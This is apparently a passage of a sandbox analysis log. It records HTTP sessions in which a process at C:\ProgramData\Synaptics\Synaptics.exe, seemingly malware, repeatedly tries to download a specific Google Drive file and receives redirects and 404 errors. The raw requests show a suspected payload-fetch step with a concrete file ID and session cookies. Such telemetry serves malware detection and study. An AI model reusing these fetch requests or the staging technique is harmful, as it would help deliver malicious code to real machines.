                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.949733142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7mbSrGnnhmMv9UmZKzzX2QNDs66DM-0IwkqRgw0upMps9THjGlZTjTws1YRYEYzV0PLDp4bqE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AarvdY-B9VdsfJLqR_57pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 50 46 6b 58 2d 67 34 73 6a 4f 77 56 31 70 43 34 56 66 57 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="zPFkX-g4sjOwV1pC4VfWiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.949734142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.949743142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC78WH2aQ4H0haM8uSur0MTXrEhLMcknkFGY4awX1-JEYYWodeMjpOk3e8ngSJPmgD0O
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1hJselt7JyWs-IlT9xc4IA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 62 41 68 70 5a 62 41 78 65 77 68 65 6d 6a 41 52 58 30 5a 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="3bAhpZbAxewhemjARX0ZQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.949742142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-z5sSZeGh8oNd0N42wzeGdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.949744142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hD00xHZ6S1zPWwdbLkzOmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.949747142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-iKshvlXGgPh6S8FVPwfrHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.949748142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC67ZWE3HbwZYYqmy-HkpddXX9XWeXrshRkh9nu22j3_7I_JBJyIlOpc6eiiSQQEpnGpCRfOFjs
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5uNVTAlXcFdEHk_x6A0qrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 31 34 6c 30 4e 43 41 72 77 76 51 6e 56 58 47 4a 43 4d 2d 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="n14l0NCArwvQnVXGJCM-mA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.949749142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-bGeGaeWFrNRPalmwcesekA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.949750142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4qSo2eWnQVRGGSs6Nd4z5cyzrXMkCxLJ6jBB7LVu4A9e4A40V4f6VbAbscLz5-I1hvMU-T3Wo
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UVVVf8XLAMoyvuA2LbwP4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
